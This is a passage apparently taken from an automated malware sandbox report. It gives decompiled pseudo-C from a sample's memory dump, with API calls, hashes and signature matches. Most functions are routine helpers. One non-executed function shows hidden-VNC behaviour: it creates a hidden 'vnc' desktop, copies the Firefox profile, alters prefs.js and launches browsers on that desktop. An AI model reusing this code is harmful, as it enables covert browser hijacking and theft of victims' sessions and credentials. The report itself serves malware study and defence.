                                  • Opcode Fuzzy Hash: 9070c27b8a4b9f148fcf1c292b5093e63aa80bcd4563dcd4d2d625aad2e24fc1
                                  • Instruction Fuzzy Hash: FFB0923A009020EFEB222F14FC0C8C4BBB5EF0925131185BAF08182138CBB20C519B94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			// Process-heap allocator (malloc equivalent, no HEAP_ZERO_MEMORY), used
                                   			// for example by E004109A0 above.
                                   			E00401085(long _a4) {
                                  				void* _t3;
                                  
                                  				_t3 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                  				return _t3;
                                   			}

                                   Instruction addresses: 0x00401092, 0x00401098

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction ID: edbd1dd06743cb7a1a2c428d36d16fad14126cf83079969d3a169869f5bf1203
                                  • Opcode Fuzzy Hash: 361bd0a745674208a41a1b438dab8da89b21d4b91da0fe10cf2071da8b51176b
                                  • Instruction Fuzzy Hash: 06B00275558200ABDE516BA09F0DB597A75AB48702F048594B24585060C77544519B66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                   			// Process-heap free, the counterpart of E00401085. Note that E00401099,
                                   			// listed under E004109A0's subcalls above, is a second HeapFree wrapper.
                                   			E00406034(void* __ecx) {
                                  				int _t2;
                                  
                                  				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
                                  				return _t2;
                                   			}

                                   Instruction addresses: 0x0040603e, 0x00406044

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,00403156,?,00405D68,00000000,?,00412694,?,?,0041577A), ref: 00406037
                                  • HeapFree.KERNEL32(00000000), ref: 0040603E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$FreeProcess
                                  • String ID:
                                  • API String ID: 3859560861-0
                                  • Opcode ID: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                  • Instruction ID: 97b5132d47626f22dbbfebbef4f37b02692f87ed7e1fea3e09d59c323e792602
                                  • Opcode Fuzzy Hash: 23d5df900dac21bab6a333045b0a5e3ddfb1a785034aa4cb4a057aa396afd6b2
                                  • Instruction Fuzzy Hash: 27A002719682009BDE5467B09E0DB563939A748702F048554B20985151D67454018675
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                   			// COM object teardown. For each interface pointer held by the object
                                   			// (+0x34, +0x18, +0x24) the vtable slot at +8 is invoked, which on x86 is
                                   			// IUnknown::Release (QueryInterface +0, AddRef +4, Release +8); the
                                   			// pointer at +0x34 first gets its vtable slot +0x24 (slot 9) called, an
                                   			// interface-specific method whose meaning cannot be determined from this
                                   			// listing. E00402562 releases the buffer members at +0x1c..+0x30, and
                                   			// CoUninitialize balances an earlier CoInitialize.
                                   			E00414C38(void* __ecx) {
                                  				void* _t22;
                                  				intOrPtr* _t32;
                                  				intOrPtr* _t33;
                                  				intOrPtr* _t34;
                                  				intOrPtr* _t37;
                                  				void* _t42;
                                  
                                  				_t42 = __ecx;
                                  				_t32 =  *((intOrPtr*)(__ecx + 0x34));
                                  				if(_t32 != 0) {
                                   					 *((intOrPtr*)( *_t32 + 0x24))(_t32); // vtable slot 9: interface-specific method
                                  				}
                                  				_t33 =  *((intOrPtr*)(_t42 + 0x34));
                                  				if(_t33 != 0) {
                                   					 *((intOrPtr*)( *_t33 + 8))(_t33); // vtable +8 == IUnknown::Release
                                  					 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                  				}
                                  				_t34 =  *((intOrPtr*)(_t42 + 0x18));
                                  				if(_t34 != 0) {
                                  					 *((intOrPtr*)( *_t34 + 8))(_t34);
                                  					 *((intOrPtr*)(_t42 + 0x18)) = 0;
                                  				}
                                  				E00402562(_t42 + 0x1c);
                                  				E00402562(_t42 + 0x20);
                                  				_t37 =  *((intOrPtr*)(_t42 + 0x24));
                                  				if(_t37 != 0) {
                                  					 *((intOrPtr*)( *_t37 + 8))(_t37);
                                  					 *((intOrPtr*)(_t42 + 0x24)) = 0;
                                  				}
                                  				E00402562(_t42 + 0x28);
                                  				E00402562(_t42 + 0x2c);
                                  				_t22 = E00402562(_t42 + 0x30);
                                  				 *((intOrPtr*)(_t42 + 0x34)) = 0;
                                  				__imp__CoUninitialize(); // executed
                                  				return _t22;
                                  			}










                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Uninitialize
                                  • String ID:
                                  • API String ID: 3861434553-0
                                  • Opcode ID: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction ID: 5160318e26e57bbb59a4e031077ca80efc8ba31f4ff7defc0b7589d9c5b86bff
                                  • Opcode Fuzzy Hash: f409e6eadb3aaa3bb9f8bd5a13b75d6ab8235dd759573a421781aaf34dc19ad9
                                  • Instruction Fuzzy Hash: DC012E752027008BC328DF36C698866B7F4BF94700301092EA48787AA1DB35F941CA48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00410C8A(WCHAR** __ecx, void* __edx, void* __eflags) {
                                  				char _v524;
                                  				WCHAR** _t13;
                                  				void* _t14;
                                  
                                  				_t14 = __edx;
                                  				_t13 = __ecx;
                                  				E00401052( &_v524, 0, 0x208);
                                  				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed
                                  				E004036F7(_t13,  &_v524); // executed
                                  				return _t13;
                                  			}







                                  APIs
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FolderPathSpeciallstrcpy
                                  • String ID:
                                  • API String ID: 1680175942-0
                                  • Opcode ID: 5b2eee6966b55b0b689df07c47954d9a079f2730c76c384eb967d1f6a3990424
                                  • Instruction ID: cf24a81cd299cbc4f05302b0a76130d0710c8618247d4c3c57238b1560f083e9
                                  • Opcode Fuzzy Hash: 5b2eee6966b55b0b689df07c47954d9a079f2730c76c384eb967d1f6a3990424
                                  • Instruction Fuzzy Hash: 6BE0D875B0031837DB70A6169C0EFC73A6CCBC0715F0001B2BA58E32D1ED74EA45C6A4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00412514(void** __ecx, short** _a8) {
                                  				int _v8;
                                  				signed int _t8;
                                  
                                  				_push(__ecx);
                                  				_v8 = 0;
                                  				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
                                  				if(_t8 != 0) {
                                  					return 0;
                                  				}
                                  				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
                                  			}






                                  APIs
                                  • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74A313FB,?,?,0041270B,?,?), ref: 00412534
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                  • Instruction ID: 6b4a3946c2a43bcd037634b81ad519b7cc297f2607030efe808653eea7f4a6e3
                                  • Opcode Fuzzy Hash: 5228ff0b190b937b08b73a2a7384eafff423ad1fc8258efa1007a891bcb9c750
                                  • Instruction Fuzzy Hash: DCE0D832515325FFDB208B528D48ECB7F7DDB057E4F008115F509D2150D2B18640D5F4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004032E6(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
                                  				short _v1028;
                                  				WCHAR** _t14;
                                  				WCHAR** _t15;
                                  
                                  				_t15 = __edx;
                                  				_t14 = __ecx;
                                  				E00401052( &_v1028, 0, 0x400);
                                  				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
                                  				E004036F7(_t14,  &_v1028); // executed
                                  				return _t14;
                                  			}







                                  APIs
                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                  • String ID:
                                  • API String ID: 1709970682-0
                                  • Opcode ID: 6c91cbb0185144303db70d390597fcf272f18e3465f150284448be57c2be313a
                                  • Instruction ID: c9e9bc113a16d457794ea73b6dea9160bc4569d11f418ada23e118eebf44067f
                                  • Opcode Fuzzy Hash: 6c91cbb0185144303db70d390597fcf272f18e3465f150284448be57c2be313a
                                  • Instruction Fuzzy Hash: E9E048B670015967DB30A6169C06FD6776DDBC471CF0400B9B709F21D0E975DA06C6A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004125DF(void** __ecx, short** _a4, char** _a8, int _a12) {
                                  				long _t8;
                                  				void* _t13;
                                  
                                  				_t13 =  *__ecx;
                                  				if(_t13 == 0) {
                                  					L3:
                                  					return 0;
                                  				}
                                  				_t8 = RegSetValueExW(_t13,  *_a4, 0, _a12,  *_a8, _a8[1]); // executed
                                  				if(_t8 != 0) {
                                  					goto L3;
                                  				}
                                  				return _t8 + 1;
                                  			}






                                  APIs
                                  • RegSetValueExW.KERNEL32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 725edb401eb3285b3aade53387efa27f2a736d8688efe74a972a861434cd0a44
                                  • Instruction ID: 82cc8a580631751598ccbc2721819c589a0b77c802dca66c40913ee06865ecb6
                                  • Opcode Fuzzy Hash: 725edb401eb3285b3aade53387efa27f2a736d8688efe74a972a861434cd0a44
                                  • Instruction Fuzzy Hash: AFE04F31205214AFDB00CF54CD84EEB77A8EF49750B14C05AF905DB360D2B1EC61ABA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00405A23(void* __ecx, void* __eflags) {
                                  
                                  				E004032D5(__ecx);
                                  				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x30)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x34)) = 0;
                                  				E004117B7(__ecx + 0x1d8, __ecx);
                                  				__imp__#115(2, __ecx + 0x38); // executed
                                  				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
                                  				 *((intOrPtr*)(__ecx + 0x18)) = 0;
                                  				 *((intOrPtr*)(__ecx + 0x24)) = 0;
                                  				return __ecx;
                                  			}




                                  APIs
                                    • Part of subcall function 004117B7: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  • WSAStartup.WS2_32(00000002,?), ref: 00405A4C
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutexStartup
                                  • String ID:
                                  • API String ID: 3730780901-0
                                  • Opcode ID: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction ID: 2a260520f2afbb8a1e0ca9aeaaef8dbe40d0ee1d54cebc48408a6e1b33bc0553
                                  • Opcode Fuzzy Hash: 8fc4056cf67e8e1589ff72f7a35a52cbe4d60c4a23f4d9fffcf1e601f2432e09
                                  • Instruction Fuzzy Hash: 8DE03971500B008BC270AF2B9945893FBF8FF907207000A1FE5A682AA0C7B0B1048B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004112C4(intOrPtr* __ecx, CHAR** _a4) {
                                  				intOrPtr* _t10;
                                  
                                  				_t10 = __ecx;
                                  				E00403237(__ecx + 4, _a4); // executed
                                  				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
                                  				return 1;
                                  			}





                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 004112DF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEventlstrcat
                                  • String ID:
                                  • API String ID: 2275612694-0
                                  • Opcode ID: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction ID: 39468192288ec31cf53fa38ac828197baabee26d9983865f2de3b863843106a1
                                  • Opcode Fuzzy Hash: 6d37ef84c37783529fc4d2debaab04c5f689fd435ec9aa43ab3e61700c21c811
                                  • Instruction Fuzzy Hash: 7CD02E322082017BD700AF91DC02F92BF29EB50760F008036F24882180CBB1A020C790
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004117B7(void** __ecx) {
                                  				void* _t5;
                                  				void** _t10;
                                  
                                  				_t10 = __ecx;
                                  				_t5 = CreateMutexA(0, 0, 0); // executed
                                  				 *_t10 = _t5;
                                  				_t10[1] = 0 | _t5 != 0xffffffff;
                                  				return _t10;
                                  			}






                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,004113FD,?,?,00411978,?,74A313FB,00000000,00405B72), ref: 004117BF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID:
                                  • API String ID: 1964310414-0
                                  • Opcode ID: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction ID: d1f17f3edcdec86f78565eb2beadc44be2d21716b89def248c0870d2ffc3ae74
                                  • Opcode Fuzzy Hash: 9b62faa460be2adddf2a4740bf86999dfbec1966c7ca0747a50593f43ad6b7fc
                                  • Instruction Fuzzy Hash: 72D012F15045206FA3249F395C088A775DDDF98730315CF39B4A5C72D4E5308C808760
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412554(void** __ecx) {
                                  				long _t1;
                                  				signed int* _t3;
                                  
                                  				_t3 = __ecx;
                                  				if( *__ecx != 0) {
                                  					_t1 = RegCloseKey( *__ecx); // executed
                                  				}
                                  				 *_t3 =  *_t3 & 0x00000000;
                                  				return _t1;
                                  			}






                                  APIs
                                  • RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                  • Instruction ID: 9d8d642a2df10e52aa6db1d194c77715a7231d9df8bfeebc40ec518d9b126583
                                  • Opcode Fuzzy Hash: d1cf315f0c3b828755566f774ab1677f06f540783bee4846a1eb8c5dc7d1a683
                                  • Instruction Fuzzy Hash: 13C04C31014221DBD7355F14E4047D57BF5AB05352F25046E90C055164E7B509D0CA48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction ID: bf7d7d0385146835833033b658300741a11cd90afef40312a0121630c5b8194d
                                  • Opcode Fuzzy Hash: 9a991b3da34938619209aa850904dd2585657d0af3bfd830ffa1374368b66a4b
                                  • Instruction Fuzzy Hash: 7AB012303E82005BDE101B708C06F103520A712B07F2001B0B112C90E0C66100065504
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405F68(long __ecx) {
                                  				void* _t1;
                                  				long _t7;
                                  				void* _t8;
                                  
                                  				_t7 = __ecx;
                                  				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                  				_t8 = _t1;
                                  				E00406077(_t8, _t7);
                                  				return _t8;
                                  			}







                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004034F4,?,00405B8D,.bss,00000000), ref: 00405F76
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction ID: e48ffaa35cf7c95941dea0d5a44f438d870c849a0c4b6b129c3fdc7458d1fa28
                                  • Opcode Fuzzy Hash: f1a7ba58f94a8befa6630eb27b5e9bf87aed46268b93f7419a6681cf929e3ed4
                                  • Instruction Fuzzy Hash: 58C012223482602AE124111A7C1AF5B9DACCBC1FB1F01002FF6059A2D0D9D00C0181A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00409733(void* __eax, void* __ecx) {
                                  				int _t3;
                                  				void* _t5;
                                  
                                  				_t5 =  *(__ecx + 0x10);
                                  				if(_t5 != 0) {
                                  					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
                                  					return _t3;
                                  				} else {
                                  					return __eax;
                                  				}
                                  			}






                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction ID: d77e01f5aa36a87b39216e07334d8eada759ddd446e76f586daee25b3cfe99bb
                                  • Opcode Fuzzy Hash: 9bc93bb1a3698aea7ee270b90f1be36fa01f6a0388a93eaf891ae68bb0364329
                                  • Instruction Fuzzy Hash: F8B0923438070157EE2CDB208C55F6A2220BB80B05FA089ACB102AA1D08AB9E4028A08
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405FFA(long __ecx) {
                                  				void* _t1;
                                  
                                  				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
                                  				return _t1;
                                  			}





                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403764,?,?,?,00412AE3,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?VA,00000000,74A313FB,00000000), ref: 00406004
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction ID: d603def4ad70c1049ddec86c054817805532c4fd5811fc6e80ce733ca9b25ee4
                                  • Opcode Fuzzy Hash: 03a753f4e56950697ff4e71072d1805ec65d3fd45af3395555f01cc7733772b7
                                  • Instruction Fuzzy Hash: 40A002B07D93047EFD6997509D1FF553D68A744F16F604154B3096D0D0A5E02500C52D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405FEB(void* __ecx) {
                                  				int _t1;
                                  
                                  				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
                                  				return _t1;
                                  			}





                                  APIs
                                  • VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction ID: a4afafc7f9fbe744b945ffb19ace319cc8b7579b2679098b8a9567e0cb6a054f
                                  • Opcode Fuzzy Hash: 7c6eb06f239127f0dcae98b16747e067cbb9817e51cb8f59be5681c4efa5b6de
                                  • Instruction Fuzzy Hash: E6A002706D470066ED7457605D4AF4526247740B51F208A947241A80E08AF5A0458A5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  C-Code - Quality: 78%
                                  			E00413695(void* __ecx, void* __eflags, WCHAR* _a4) {
                                  				WCHAR* _v12;
                                  				int _v16;
                                  				WCHAR* _v20;
                                  				struct _SECURITY_ATTRIBUTES* _v24;
                                  				struct _SECURITY_ATTRIBUTES* _v28;
                                  				WCHAR* _v32;
                                  				WCHAR* _v36;
                                  				char _v40;
                                  				char _v44;
                                  				struct _SECURITY_ATTRIBUTES* _v50;
                                  				struct _SECURITY_ATTRIBUTES* _v54;
                                  				struct _SECURITY_ATTRIBUTES* _v58;
                                  				struct _SHFILEOPSTRUCTW _v76;
                                  				long _v80;
                                  				struct _PROCESS_INFORMATION _v96;
                                  				struct _PROCESS_INFORMATION _v112;
                                  				struct _STARTUPINFOW _v184;
                                  				struct _STARTUPINFOW _v256;
                                  				short _v776;
                                  				short _v1296;
                                  				WCHAR* _t170;
                                  				WCHAR* _t176;
                                  				void* _t178;
                                  				void* _t179;
                                  				void* _t187;
                                  				void* _t289;
                                  				long _t354;
                                  				WCHAR* _t355;
                                  				void* _t466;
                                  				void* _t467;
                                  				void* _t468;
                                  				void* _t469;
                                  				void* _t470;
                                  				void* _t471;
                                  				signed int _t474;
                                  				void* _t485;
                                  				WCHAR* _t486;
                                  				void* _t491;
                                  				WCHAR* _t494;
                                  
                                  				_t354 = 0x44;
                                  				E00401052( &_v184, 0, _t354);
                                  				_v184.cb = _t354;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t170 = L"vnc";
                                  				_v184.lpDesktop = _t170;
                                  				CreateDesktopW(_t170, 0, 0, 0, 0x10000000, 0);
                                  				E00401052( &_v1296, 0, 0x208);
                                  				if(E00403373( &_a4) != 0) {
                                  					_t176 = CharLowerW(PathFindFileNameW(_a4));
                                  					_t355 = _a4;
                                  				} else {
                                  					_v16 = 0x104;
                                  					AssocQueryStringW(0, 2, L"http", L"open",  &_v1296,  &_v16);
                                  					_t176 = CharLowerW(PathFindFileNameW( &_v1296));
                                  					_t355 =  &_v1296;
                                  				}
                                  				_t482 = _t176;
                                  				_v32 = _t355;
                                  				if(E00401144(_t176, L"chrome.exe") != 0) {
                                  					_t178 = E00401144(_t482, L"firefox.exe");
                                  					__eflags = _t178;
                                  					if(_t178 != 0) {
                                  						_t179 = E00401144(_t482, L"iexplore.exe");
                                  						__eflags = _t179;
                                  						_push( &_v96);
                                  						_push( &_v184);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						_push(0);
                                  						if(_t179 != 0) {
                                  							CreateProcessW(_a4, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                  							_t474 = _v96.dwProcessId;
                                  							goto L16;
                                  						}
                                  						CreateProcessW(_t355, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                  						_push(0xfffffffd);
                                  						goto L14;
                                  					}
                                  					_t187 = E00412155(E004036F7( &_v16, L"firefox.exe"));
                                  					E00405FEB(_v16);
                                  					_t474 = 0xffffffff;
                                  					_push(0x208);
                                  					__eflags = _t187;
                                  					if(_t187 == 0) {
                                  						_push(0);
                                  						_push( &_v776);
                                  						E00401052();
                                  						_t467 = 0x28;
                                  						E00410C8A( &_v20, _t467, __eflags);
                                  						E0040373F( &_v12,  &_v20);
                                  						E00403447( &_v12, __eflags, E004036F7( &_v44, L"\\AppData\\Roaming\\Mozilla\\Firefox\\"));
                                  						E00405FEB(_v44);
                                  						E0040373F( &_v16,  &_v12);
                                  						E0040357C( &_v16, _t467, __eflags, L"profiles.ini");
                                  						GetPrivateProfileStringW(L"Profile0", L"Path", 0,  &_v776, 0x104, _v16);
                                  						E0040357C( &_v12, _t467, __eflags,  &_v776);
                                  						E00403447( &_v12, __eflags, E004036F7( &_v44, L"\\prefs.js"));
                                  						E00405FEB(_v44);
                                  						_t485 = CreateFileW(_v12, 4, 3, 0, 4, 0x80, 0);
                                  						WriteFile(_t485, "user_pref(\"layers.acceleration.disabled\", true);", 0x30,  &_v80, 0);
                                  						CloseHandle(_t485);
                                  						CreateProcessW(_t355, 0, 0, 0, 0, 0, 0, 0,  &_v184,  &_v96);
                                  						E00405FEB(_v16);
                                  						E00405FEB(_v12);
                                  						E00405FEB(_v20);
                                  					} else {
                                  						_push(0);
                                  						_push( &_v776);
                                  						E00401052();
                                  						_t468 = 0x28;
                                  						E00410C8A( &_v16, _t468, __eflags);
                                  						E0040373F( &_v32,  &_v16);
                                  						E00403447( &_v32, __eflags, E004036F7( &_v20, L"\\AppData\\Roaming\\Mozilla\\Firefox\\"));
                                  						E00405FEB(_v20);
                                  						E0040373F( &_v12,  &_v16);
                                  						E00403447( &_v12, __eflags, E004036F7( &_v20, L"\\AppData\\Roaming\\FirefoxBackup"));
                                  						E00405FEB(_v20);
                                  						_t486 = _v12;
                                  						_v76.fFlags = 0x414;
                                  						_v76.hwnd = 0;
                                  						_v76.wFunc = 3;
                                  						_v76.pFrom = _t486;
                                  						_v76.pTo = 0;
                                  						_v58 = 0;
                                  						_v50 = 0;
                                  						_v54 = 0;
                                  						SHFileOperationW( &_v76);
                                  						CreateDirectoryW(_t486, 0);
                                  						E0040373F( &_v36,  &_v32);
                                  						E0040357C( &_v36, _t468, __eflags, L"profiles.ini");
                                  						GetPrivateProfileStringW(L"Profile0", L"Path", 0,  &_v776, 0x104, _v36);
                                  						E0040373F( &_v40,  &_v32);
                                  						E0040357C( &_v40, _t468, __eflags,  &_v776);
                                  						E004036F7( &_v24, L"xcopy.exe /H /Y /E /C ");
                                  						E00403447(E004033D1( &_v24, _t468, __eflags, "\""), __eflags,  &_v40);
                                  						E00403447(E004033D1(E004033D1(E004033D1(_t244, _t468, __eflags, "\""), _t468, __eflags, " "), _t468, __eflags, "\""), __eflags,  &_v12);
                                  						E004033D1(_t249, _t468, __eflags, "\"");
                                  						_t469 = 0x25;
                                  						E00410C8A( &_v20, _t469, __eflags);
                                  						E00403447( &_v20, __eflags, E004036F7( &_v44, L"\\xcopy.exe"));
                                  						E00405FEB(_v44);
                                  						E00401052( &_v256, 0, 0x44);
                                  						CreateProcessW(_v20, _v24, 0, 0, 0, 0x8000000, 0, 0,  &_v256,  &_v112);
